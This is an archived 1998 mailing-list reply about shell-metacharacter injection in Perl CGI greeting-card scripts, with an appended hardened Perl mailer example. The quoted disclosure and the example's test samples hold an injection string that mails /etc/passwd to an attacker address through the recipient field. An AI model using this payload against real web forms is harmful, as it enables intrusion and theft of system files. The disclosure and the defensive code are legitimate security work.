G'day,

As a related note, the WebCards program (V1.6) by Sam Kareem (webmasterat_private) is subject to the same vulnerability.

Regards,
Karl

On Mon, 9 Nov 1998, xnec wrote:

> INFO:
> After looking over the perl-CGI scripts on www.cgi-resources.com,
> I've discovered vulnerabilities in the following:
> -----Snip----8<-----------------
>
> EXPLOIT:
>
> Each of these is exploitable by inputting metacharacters into the
> recipient's email address. Each script calls something similar
> to:
>
> open( MAIL, "|$mailprog $email" )
> # this particular line is from the LakeWeb scripts
>
> The exploit strings are simple, something like
> &mail evilat_private < /etc/passwd&@host.com will work for each script
> (the @host.com is necessary because some hosts check for "@" and ".")
> when placed in the Recipient Email field.
> -----Snip-----8<---------------
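
A hardened form of the quoted `open( MAIL, "|$mailprog $email" )` call, as an added example that is not part of either message or of the scripts discussed. The mailer path, the function names `valid_recipient` and `send_card`, and the card subject line are assumptions made for illustration.

```perl
#!/usr/bin/perl
# Added example: the recipient never reaches a shell or the mailer's argv.
use strict;
use warnings;

# Assumption: a sendmail-compatible binary lives at this path.
my $mailprog = '/usr/sbin/sendmail';

# Conservative allowlist: rejects shell metacharacters, whitespace, CR/LF
# (header injection) and a leading '-' (option injection).
sub valid_recipient {
    my ($addr) = @_;
    return 0 unless defined $addr && length($addr) <= 254;
    my $label = qr/[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?/;
    return $addr =~ /\A[A-Za-z0-9_][A-Za-z0-9._+-]*\@$label(?:\.$label)+\z/ ? 1 : 0;
}

# Hypothetical sender; it is defined here but not called by the demo loop.
sub send_card {
    my ($to, $body) = @_;
    die "rejected recipient\n" unless valid_recipient($to);
    # List-form pipe open execs $mailprog directly, with no /bin/sh in between.
    # -t takes recipients from the headers; -oi stops a lone "." ending input.
    open(my $mail, '|-', $mailprog, '-t', '-oi')
        or die "cannot run $mailprog: $!\n";
    print {$mail} "To: $to\nSubject: You have a card\n\n$body\n";
    close($mail) or die "mailer failed: $?\n";
}

# Constructed sample inputs, including the string quoted in the post above.
my @samples = (
    'alice@example.com',
    '&mail evilat_private < /etc/passwd&@host.com',
    "bob\@example.com\nBcc: x\@example.net",
    '-oQ/tmp@example.com',
);

for my $input (@samples) {
    (my $shown = $input) =~ s/\n/\\n/g;    # make embedded newlines visible
    printf "%-50s %s\n", $shown,
        valid_recipient($input) ? 'accepted' : 'rejected';
}
```

Only the first sample is accepted. The validation and the list-form `open` are independent layers, so a gap in the pattern still does not hand the input to a shell.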
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:22:40 PDT